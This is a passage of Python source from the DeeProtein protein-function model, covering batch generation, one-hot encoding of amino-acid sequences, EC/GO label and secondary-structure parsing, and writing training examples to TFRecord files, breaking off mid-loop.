self.AA_to_id[aa] = {'id': len(self.AA_to_id),
'hydro': _hydro[i],
'molweight': _molarweight[i],
'pol': _is_polar(aa),
'arom': _is_aromatic(aa),
'sulf': _has_sulfur(aa),
'OH': _has_hydroxyl(aa)}
else:
for aa in AAs:
self.AA_to_id[aa] = len(self.AA_to_id)
# get the inverse:
self.id_to_AA = {}
for aa, id in self.AA_to_id.items():
self.id_to_AA[id] = aa
self.id_to_AA[42] = '_'
def _get_class_dict(self):
"""Generate the class-dict.
The class dict stores the link between the index in the one-hot encoding and the class.
"""
with open(self._opts._ecfile, "r") as ec_fobj:
for line in ec_fobj:
fields = line.strip().split()
if fields[1].endswith('.csv'):
fields[1] = fields[1].rstrip('.csv')
if self._opts._labels == 'EC':
self.class_dict[fields[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
if self._opts._labels == 'GO':
self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
# get a reverse dict:
for key in self.class_dict.keys():
self.id_to_class[self.class_dict[key]['id']] = key
def _update_embedding_dict(self, name, labels):
"""Helper function for the DeeProtein.generate_embedding().
Update the embedding dict for new entries. This is used on the fly as we perform inference batchgen.
Args:
name: A `str`, name of the new token/protein
labels: A `list` of strings which labels to assign to the new token
"""
if len(self.embedding_dict) == 0:
# add UNK token the first time this method is called
self.embedding_dict['UNK'] = {}
self.embedding_dict['UNK']['labels'] = ['UNK']
self.embedding_dict['UNK']['id'] = 0 # we save 0 for the UNK token
# check if the key (= name) is already in the dict:
if name not in self.embedding_dict:
assert len(self.embedding_dict) > 0
self.embedding_dict[name] = {}
self.embedding_dict[name]['labels'] = labels
self.embedding_dict[name]['id'] = len(self.embedding_dict)
else:
# get a new entry to the dict:
name_matches = [k for k in self.embedding_dict.keys() if k.startswith(name)]
new_name = name + str(len(name_matches))
assert len(self.embedding_dict) > 0
self.embedding_dict[new_name] = {}
self.embedding_dict[new_name]['labels'] = labels
self.embedding_dict[new_name]['id'] = len(self.embedding_dict)
def _csv_EC_decoder(self, in_csv, encoded_labels=True):
"""Helper function for _process_csv().
This function takes an in csv obj and iterates over the lines.
Args:
in_csv: `fileobject`, the incsv file object.
            encoded_labels: `bool`, whether to return one-hot encoded labels or the label as string (optional).
Defaults to True.
Returns:
name: A `str` holding the name of the sample sequence.
seq: A `str` holding the sequence.
            label: A `str` holding the label(s).
"""
assert self.mode == 'one_hot_padded', 'mode must be one_hot_padded'
line = in_csv.readline()
fields = line.strip().split(';')
name = fields[0]
seq = fields[1]
if fields[2].endswith('.csv'): #TODO assert this
fields[2] = fields[2].rstrip('.csv')
if self._opts._labels == 'EC':
EC_str = fields[2] #TODO assert this
if encoded_labels:
EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id']
label = [[EC_CLASS]] # we need a 2D array
else:
label = EC_str
elif self._opts._labels == 'GO':
GO_str = fields[2] #TODO assert this
GOs = 0 if self._opts._inferencemode else fields[2].split(',') #TODO assert this
if encoded_labels:
label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array
else:
label = GOs
return name, seq, label
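    # Illustration (editorial addition): _csv_EC_decoder expects semicolon-separated lines of the
    # form name;sequence;labels. A hypothetical GO-labelled line would look like
    #
    #   P12345;MKTAYIAKQRQISFVKSHFSRQLEERLGLIEVQ;GO:0003824,GO:0008270
    #
    # where the GO terms must be keys of self.class_dict built from the EC_file.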
def _seq2tensor(self, seq):
"""Helper function for _process_csv().
Takes a sequence and encodes it onehot.
Args:
seq: `str`, The sequence to encode
Returns:
padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos.
length: A `Tensor` holding the length.
"""
if self.mode == 'one_hot_padded':
# first check if the sequence fits in the box:
if len(seq) <= self._opts._windowlength:
seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32)
# if sequence does not fit we clip it:
else:
seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32)
for i in range(len(seq_matrix)):
seq_matrix[i] = self.AA_to_id[seq[i]]
start_pos = 0 #because our sequence sits at the beginning of the box
length = len(seq_matrix) #true length (1 based)
# now encode the sequence in one-hot
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix, (1, -1))),
(len(seq_matrix), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq_matrix = np.transpose(padded_seq_matrix)
del oh_seq_matrix, seq_matrix
return padded_seq_matrix, start_pos, length #true length 1 based
else:
print("Error: MODE must be of 'one_hot_padded'")
def _encode_single_seq(self, seq, desired_label=None):
"""Encode a single sequence one-hot.
        This function is intended to be used in the inference mode.
Args:
seq: A `str` holding the sequence to be encoded.
desired_label: A `str` holding the label to assign to this sequence (optional).
Returns:
oh_label: A `Tensor` holding the one_hot encoded label. This is only returned if a desired label was passed.
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos. This is only returned if a desired label was passed.
length: A `Tensor` holding the length. This is only returned if a desired label was passed.
"""
seq_matrix, start_pos, length = self._seq2tensor(seq)
# look up the label in the class_dict:
if desired_label:
desired_label_ID = self.class_dict[desired_label]['id']
# encode label one_hot:
oh_label = self.label_enc.fit_transform([[desired_label_ID]]) # of shape [1, n_classes]
return oh_label, seq_matrix, start_pos, length
else:
return seq_matrix
def _process_csv(self, queue, return_name=True, encode_labels=True):
"""Iterate over a dataset.csv and process the samples.
Takes the path to a file and processes the samples a sample at a time whenever the function is called.
Args:
            queue: the open `fileObject` of the dataset.csv. The csv lines are of the form:
              name;seq;labels.
return_name: `bool` whether to return the sequence name or not. Defaults to True.
encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True.
Returns:
Depending on return_name either (if true):
name: A `str` holding the sample name.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
OR
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
"""
name, seq, label = self._csv_EC_decoder(queue, encoded_labels=encode_labels)
seq_matrix, start_pos, end_pos = self._seq2tensor(seq)
if return_name:
return name, label, seq_matrix, start_pos, end_pos
else:
return label, seq_matrix, start_pos, end_pos
def generate_garbage_sequence(self, return_name=False):
"""Generate a garbage sequence.
        Generates a sequence full of garbage, i.e. an obviously non-functional sequence. Used to test the robustness of
        the model precision.
        Args:
            return_name: A `bool`, if True return the garbage sequence along with a generated name.
Returns:
name: A `str` holding the sample name (if return_name is True).
padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
The labels of a garbage sequence are a zeros Tensor.
garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence).
"""
modes = ['complete_random', 'pattern', 'same']
mode = modes[random.randint(0, 2)]
self.garbage_count += 1
# get the length of the protein
length = random.randint(175, self._opts._windowlength-10) #enforce padding
if mode == 'pattern':
#print('pattern')
# Generate a repetitive pattern of 5 AminoAcids to generate the prot
# get a random nr of AAs to generate the pattern:
AA_nr = random.randint(2, 5)
# get an index for each AA in AA_nr
idxs = []
for aa in range(AA_nr):
idx_found = False
while not idx_found:
aa_idx = random.randint(0, 19)
if not aa_idx in idxs:
idxs.append(aa_idx)
idx_found = True
reps = math.ceil(length/AA_nr)
seq = reps * idxs
length = len(seq)
elif mode == 'complete_random':
# print('complete_random')
seq = []
for aa in range(length):
# get an idx for every pos in length:
idx = random.randint(0, 19)
seq.append(idx)
elif mode == 'same':
# print('ONE')
AA = random.randint(0, 19)
seq = length * [AA]
label = np.zeros([self._opts._nclasses])
label = np.expand_dims(label, axis=0)
garbage_label = np.asarray([1])
garbage_label = np.expand_dims(garbage_label, axis=0)
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq = np.transpose(padded_seq_matrix)
if return_name:
# return a sequence ID to identify the generated sequence
# generate a "random" name
name = 'g%d' % self.garbage_count
return name, padded_seq, label, garbage_label
else:
return padded_seq, label, garbage_label
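    # Shape sketch (editorial addition): with return_name=False the call
    #
    #   padded_seq, label, garbage_label = self.generate_garbage_sequence()
    #
    # yields padded_seq of shape (20, windowlength), an all-zero label of shape
    # (1, n_classes) and garbage_label of shape (1, 1) containing a 1.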
def generate_random_data_batch(self):
"""Generates a batch consisting solely of random data.
Generate a batch full of random data drawn form a normal distribution.
Returns:
seq_tensor_batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the random data batch.
onehot_labelled_batch: A `Tensor`, [batchsize, n_classes] holding the random labels.
"""
seq_tensor_batch = tf.random_normal([self._opts._batchsize, self._opts._embeddingdim,
self._opts._windowlength, 1])
label_batch = [np.random.randint(1,self._opts._nclasses) for _ in range(self._opts._batchsize)]
index_batch = [tf.constant(label) for label in label_batch]
label_tensor = tf.stack(index_batch)
onehot_labelled_batch = tf.one_hot(indices=tf.cast(label_tensor, tf.int32),
depth=self._opts._nclasses)
return seq_tensor_batch, onehot_labelled_batch
def generate_batch(self, is_train):
"""Generate a batch for the feed_dict pipeline.
        This function is deprecated. Please use the input pipeline along with the TFrecords_generator
        for training sequence input.
Args:
is_train: A `bool` from which dataset (train/valid) to draw the samples.
Returns:
batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the inference data batch.
label_batch: A `Tensor`, [batchsize, n_classes] holding the labels.
positions: A `Tensor` [batchsize, start, end], where the start/end position of a sequence is.
"""
seq_tensors = []
label_batch = []
positions = np.ndarray([self._opts._batchsize, 2])
lengths = np.ndarray([self._opts._batchsize])
if is_train:
in_csv = self.traindata
else:
in_csv = self.validdata
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False,
encode_labels=True)
label_batch.append(ECclass)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False,
encode_labels=True)
label_batch.append(ECclass)
seq_tensors.append(seq_tensor)
positions[i, 0] = start_pos
positions[i, 1] = end_pos
lengths[i] = end_pos
batch = np.stack(seq_tensors, axis=0)
return batch, label_batch, positions
def generate_binary_batch(self):
"""Generate a binary batch for training protein activity.
This function requires a special input dataset, where the labels are already encoded as their target float.
Thus this function does NOT use the GO-file nor the examples dumps.
Labels should be encoded from 0 (no activity) over 0.5 (first active bin) to 1. (maximum activity).
Returns:
batch: A np.ndarray holding the batch
labels: A np.ndarray holding the labels
"""
seq_tensors = []
labels = []
in_csv = self.traindata
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
seq_tensors.append(seq_tensor)
labels.append(label)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
seq_tensors.append(seq_tensor)
labels.append(label)
# encode the labels "one-hot" although not really one hot, but rather with the passed score
        labels_tensor = [np.float32(l) for l in labels]
del labels
labels = np.stack(labels_tensor, axis=0) # [b, 1]
#print(labels.shape)
batch = np.stack(seq_tensors, axis=0)
batch = np.expand_dims(batch, axis=-1) # [b, aa, w, 1]
return batch, labels
def generate_valid_batch(self, include_garbage=False):
"""Generate a batch of sequences form the valid set for inference.
Draws samples from the valid set and generates a batch to infer the labels. As everything is fed into
the same graph, we use the same kind of preprocessing as in generate_batch().
This function is also used in the DeeProtein.generate_embedding().
Args:
include_garbage: A `bool`, if True, include garbage sequences into the valid batch (optional).
Defaults to False
Returns:
batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the sequences batch.
"""
seq_tensors = []
in_csv = self.validdata
if not include_garbage:
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
#
elif include_garbage:
num_garbage = math.ceil(self._opts._batchsize * self.garbage_percentage)
for i in range(self._opts._batchsize - num_garbage):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
for i in range(num_garbage):
name, seq_tensor, _, _ = self.generate_garbage_sequence(return_name=True)
label = 'garbage'
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
batch = np.stack(seq_tensors, axis=0)
batch = np.expand_dims(batch, axis=-1)
return batch
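# Usage sketch (editorial addition): on-the-fly batch generation for a feed_dict-style
# validation step. `opts` is an OptionHandler built from a config.JSON as shown above.
#
#   batchgen = BatchGenerator(opts)
#   valid_batch = batchgen.generate_valid_batch(include_garbage=False)
#   # valid_batch has shape [batchsize, 20, windowlength, 1]; the names of the sequences in
#   # the batch are tracked in batchgen.embedding_dict for the embedding generation.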
class TFrecords_generator():
"""TFrecords_generator of the DeeProtein model.
    This class takes a split dataset (train, valid) and generates example files in tf.Records format. This
    file format is required to train the model with the DeeProtein input pipeline.
Attributes:
_opts: A `helpers.OptionHandler` holding the global options for the module.
label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels.
AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters.
mode: A `str`. Has to be one of ['one_hot_padded']
traindata: A `fileObject` the file from which to train.
validdata: A `fileObject` the file from which to evaluate.
AA_to_id: A `dict` mapping single letter AAs to integers.
        class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specified
            in the config_dict.
        structure_dict: A `dict` mapping the structural information to an int.
        examples_per_file: A `int32`, the nr of samples included in a tf.Records file.
        epochs: A `int32` defining the nr of epochs to train.
        curr_epoch: A `int32` counter for the epochs.
writer: A `fileObj` in which to write the log messages.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False)
self.AA_enc = 'where we put the encoder for the AAs'
        self.mode = self._opts._batchgenmode # currently only 'one_hot_padded' is supported
self.traindata = open(self._opts._traindata, 'r')
self.validdata = open(self._opts._validdata, 'r')
self.AA_to_id = {}
self.class_dict = {}
self._get_class_dict()
self.structure_dict = {}
self.examples_per_file = 10000
self.epochs = self._opts._numepochs
self.curr_epoch = 0
self.writer = 'where we put the writer'
# get the structure_dict
structure_forms = ['UNORDERED', 'HELIX', 'STRAND', 'TURN']
assert len(structure_forms) == self._opts._structuredims-1
for s in structure_forms:
self.structure_dict[s] = len(self.structure_dict) + 1 #serve the 0 for NO INFORMATION
if self.mode.startswith('one_hot'):
AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',]
#'X']
self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False)
if 'physchem' in self.mode:
_hydro = [1.8, 2.5, -3.5, -3.5, 2.8,
-0.4, -3.2, 4.5, -3.9, 3.8,
1.9, -3.5, -1.6, -3.5, -4.5,
-0.8, -0.7, 4.2, -0.9, -1.3]
_molarweight = [89.094, 121.154, 133.104, 147.131, 165.192,
75.067, 155.156, 131.175, 146.189, 131.175,
149.208, 132.119, 115.132, 146.146, 174.203,
105.093, 119.119, 117.148, 204.228, 181.191]
            # membership must be tested against the string of residues, not a one-element list
            _is_polar = lambda aa: 1 if aa in 'DEHKNQRSTY' else 0
            _is_aromatic = lambda aa: 1 if aa in 'FWY' else 0
            _has_hydroxyl = lambda aa: 1 if aa in 'ST' else 0 #should we add TYR??
            _has_sulfur = lambda aa: 1 if aa in 'CM' else 0
for i, aa in enumerate(AAs):
self.AA_to_id[aa] = {'id': len(self.AA_to_id),
'hydro': _hydro[i],
'molweight': _molarweight[i],
'pol': _is_polar(aa),
'arom': _is_aromatic(aa),
'sulf': _has_sulfur(aa),
'OH': _has_hydroxyl(aa)}
else:
for aa in AAs:
self.AA_to_id[aa] = len(self.AA_to_id)
# get the inverse:
self.id_to_AA = {}
for aa, id in self.AA_to_id.items():
self.id_to_AA[id] = aa
self.id_to_AA[42] = '_'
def _get_class_dict(self):
"""
This function generates the class-dict. The class dict stores the link between the index in the one-hot
encoding and the class.
"""
with open(self._opts._ecfile, "r") as ec_fobj:
for line in ec_fobj:
fields = line.strip().split()
if fields[1].endswith('.csv'): #TODO delete this when error is fixed
fields[1] = fields[1].rstrip('.csv')
if self._opts._labels == 'EC':
self.class_dict[fields[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
if self._opts._labels == 'GO':
self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
def _csv_EC_decoder(self, in_csv):
"""Helper function for _process_csv().
This function takes an in csv obj and iterates over the lines.
Args:
in_csv: `fileobject`, the incsv file object.
        Returns:
            name: A `str` holding the name of the sample sequence.
            seq: A `str` holding the sequence.
            label: A `str` holding the label(s).
            structure_str: A `str` holding the structural annotation string.
"""
line = in_csv.readline()
fields = line.strip().split(';')
name = fields[0]
seq = fields[1]
if self._opts._labels == 'EC':
if fields[3].endswith('.csv'):
fields[3] = fields[3].rstrip('.csv')
EC_str = fields[3]
EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id']
label = [[EC_CLASS]] # we need a 2D array
elif self._opts._labels == 'GO':
GO_str = fields[2]
GOs = 0 if self._opts._inferencemode else fields[2].split(',')
if GOs[0].endswith('.csv'):
GOs = [go.rstrip('.csv') for go in GOs]
label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array
# TODO add an assertion for mode
structure_str = fields[3]
return name, seq, label, structure_str
def _seq2tensor(self, seq):
"""Helper function for _process_csv().
Takes a sequence and encodes it onehot.
Args:
seq: `str`, The sequence to encode
Returns:
padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos.
length: A `Tensor` holding the length.
"""
if self.mode == 'one_hot_padded':
# first check if the sequence fits in the box:
if len(seq) <= self._opts._windowlength:
seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32)
# if sequence does not fit we clip it:
else:
seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32)
for i in range(len(seq_matrix)):
seq_matrix[i] = self.AA_to_id[seq[i]]
start_pos = 0 #because our sequence sits at the beginning of the box
length = len(seq_matrix) #true length (1 based)
# now encode the sequence in one-hot
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix,
(1, -1))), (len(seq_matrix), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq_matrix = np.transpose(padded_seq_matrix)
del oh_seq_matrix, seq_matrix
return padded_seq_matrix, start_pos, length #true length 1 based
else:
print("Error: MODE must be of 'one_hot_padded'")
def _get_structure(self, structure_str, seq_length):
"""Encodes the 2ndary strucure of a sequence.
Construct a One Hot Encoded Tensor with height = self._structure_dims, width = self._windowlength
Args:
structure_str: A `str` object holding the structural information for a sequence.
The entry in the dataset.csv corresponds to the FT fields in the swissprot textfile download.
Example format:
[('TURN', '11', '14'), ('HELIX', '19', '27'), ('STRAND', '32', '36'), ('HELIX', '45', '54'),
('STRAND', '59', '69'), ('STRAND', '72', '80'), ('HELIX', '86', '96'), ('HELIX', '99', '112'),
('HELIX', '118', '123'), ('HELIX', '129', '131'), ('HELIX', '134', '143'), ('STRAND', '146', '149'),
('HELIX', '150', '156'), ('STRAND', '157', '159'), ('HELIX', '173', '182'), ('STRAND', '186', '189'),
('HELIX', '192', '194'), ('HELIX', '199', '211'), ('STRAND', '216', '221'), ('HELIX', '226', '239'),
('STRAND', '242', '246'), ('HELIX', '272', '275'), ('HELIX', '277', '279'), ('STRAND', '283', '285')]
Returns:
padded_structure_matrix: A `Tensor`, of shape [structure_dims, windowlength] holding the structure info.
"""
# if there is info about the structure:
if structure_str != '[]':
# get an array of len length:
structure = np.ones([seq_length])
# modify the structure str:
# TODO: Improve the super ugly hack with a proper regex
structure_str = re.sub('[\'\[\]\(]', '', structure_str)
structure_features = [j.strip(', ').split(', ') for j in structure_str.strip(')').split(')')]
for ft in structure_features:
# get the ID for the ft:
id_to_write = self.structure_dict[ft[0]]
start = int(ft[1])
end = int(ft[2])
for i in range(start, end+1):
structure[i] = id_to_write
npad = ((0, self._opts._windowlength-seq_length))
padded_structure_matrix = np.pad(structure, pad_width=npad, mode='constant', constant_values=0)
else:
# return only zeros if there is no information about the structure
padded_structure_matrix = np.zeros([self._opts._windowlength])
return padded_structure_matrix
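    # Worked example (editorial addition): for seq_length=20 and
    #
    #   structure_str = "[('HELIX', '3', '7')]"
    #
    # positions 3..7 of the returned vector hold self.structure_dict['HELIX'], the remaining
    # positions inside the sequence hold 1 (no annotated feature) and everything beyond
    # seq_length up to windowlength is zero-padded.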
def _process_csv(self, queue):
"""Iterate over a dataset.csv and process the samples.
Takes the path to a file and processes the samples a sample at a time whenever the function is called.
Args:
queue: `str` the file_path to the dataset.csv. The csv file should be in the form of:
name,seq,labels.
return_name: `bool` whether to return the sequence name or not. Defaults to True.
encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True.
Returns:
Depending on return_name either (if true):
name: A `str` holding the sample name.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
OR
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
"""
_, seq, labels, structure_str = self._csv_EC_decoder(queue)
seq_matrix, start_pos, length = self._seq2tensor(seq)
try:
structure_tensor = self._get_structure(structure_str, length)
except KeyError:
structure_tensor = 'no_stucture_defined'
# encode the label one_hot:
oh_label_tensor = self.label_enc.fit_transform(labels) # of shape [1, n_classes]
classes = oh_label_tensor.shape[0]
# open an array full of zeros to add the labels to
oh_labels = np.zeros(self._opts._nclasses)
for c in range(classes):
oh_labels += oh_label_tensor[c]
oh_labels = np.expand_dims(oh_labels, axis=0)
return oh_labels, seq_matrix, structure_tensor, start_pos, length
def generate_garbage_sequence(self):
"""Generate a garbage sequence.
        Generates a sequence full of garbage, i.e. an obviously non-functional sequence. Used to test the robustness of
        the model precision.
        Returns:
            padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence.
            label: A `Tensor` holding the all-zero label Tensor for the garbage sequence.
            garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence).
"""
modes = ['complete_random', 'pattern', 'same']
mode = modes[random.randint(0, 2)]
# get the length of the protein
length = random.randint(175, self._opts._windowlength-1)
if mode == 'pattern':
#print('pattern')
# Generate a repetitive pattern of 5 AminoAcids to generate the prot
# get a random nr of AAs to generate the pattern:
AA_nr = random.randint(2, 5)
# get an index for each AA in AA_nr
idxs = []
for aa in range(AA_nr):
idx_found = False
while not idx_found:
aa_idx = random.randint(0, 19)
if not aa_idx in idxs:
idxs.append(aa_idx)
idx_found = True
            reps = math.ceil(length/AA_nr)
            # clip the repeated pattern so it never exceeds the requested length
            # (otherwise the zero-padding below could become negative)
            seq = (reps * idxs)[:length]
            length = len(seq)
elif mode == 'complete_random':
# print('complete_random')
seq = []
for aa in range(length):
# get an idx for every pos in length:
idx = random.randint(0, 19)
seq.append(idx)
elif mode == 'same':
# print('ONE')
AA = random.randint(0, 19)
seq = length * [AA]
label = np.zeros([self._opts._nclasses])
label = np.expand_dims(label, axis=0)
garbage_label = np.asarray([1])
garbage_label = np.expand_dims(garbage_label, axis=0)
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq = np.transpose(padded_seq_matrix)
return padded_seq, label, garbage_label
def _bytes_feature(self, value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(self, value):
        return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _int64_feature(self, value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def example_to_TFrecords(self, is_train, garbage_percentage=0.2, structure=True):
"""Convert a dataset.csv into tf.Records format.
This function reads the dataset files specified in the config dict and generates examples files in
tf.Records format in the batches_dir folder specified in the config dict
Args:
is_train: A `bool` defining which dataset file to use (true: train, false: valid).
garbage_percentage: A `float` defining the percentage of garbage to add to the tf.records files.
structure: A `bool` whether to include structural information in the records or not.
"""
include_garbage = False if garbage_percentage == 0 else True
# determine how many files we need to write:
if is_train:
length_data_set = _count_lines(self._opts._traindata)
batch_files_name = os.path.basename(self._opts._traindata) + \
'train_batch_{}'.format(str(self._opts._windowlength))
print(batch_files_name)
in_csv = self.traindata
else:
length_data_set = _count_lines(self._opts._validdata)
batch_files_name = os.path.basename(self._opts._validdata) + \
'valid_batch_{}'.format(str(self._opts._windowlength))
print(batch_files_name)
in_csv = self.validdata
files_to_write = np.int32(np.ceil(length_data_set*(1+garbage_percentage)
                                           / float(self.examples_per_file)))  # account for the added garbage examples
for n in range(1, files_to_write+1):
file_path = os.path.join(self._opts._batchesdir, batch_files_name) + '_' + str(n)
self.writer = tf.python_io.TFRecordWriter(file_path)
if structure:
for i in range(self.examples_per_file):
if include_garbage and i % int(1/garbage_percentage) == 0:
# print("garbage_seq")
seq_tensor, label, garbage_label = self.generate_garbage_sequence()
structure_label = np.zeros([self._opts._windowlength])
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength), \
"%s" % str(seq_tensor.shape)
assert label.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = label.tostring()
garbage_label_raw = garbage_label.tostring()
structure_label_raw = structure_label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'structure_depth': self._int64_feature(self._opts._structuredims),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
'garbage_label_raw': self._bytes_feature(garbage_label_raw),
'structure_label_raw': self._bytes_feature(structure_label_raw),
}))
self.writer.write(example.SerializeToString())
else:
# print("validseq")
try:
oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv)
except IndexError: # catches error from csv_decoder -> reopen the file:
in_csv.close()
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv)
garbage_label = np.asarray([0]) # NOT garbage
garbage_label = np.expand_dims(garbage_label, axis=0)
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength)
assert oh_labels.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = oh_labels.tostring()
garbage_label_raw = garbage_label.tostring()
structure_label_raw = structure_label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'structure_depth': self._int64_feature(self._opts._structuredims),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
'garbage_label_raw': self._bytes_feature(garbage_label_raw),
'structure_label_raw': self._bytes_feature(structure_label_raw),
}))
self.writer.write(example.SerializeToString())
elif not structure:
for i in range(self.examples_per_file):
if include_garbage and i % int(1/garbage_percentage) == 0:
# print("garbage_seq")
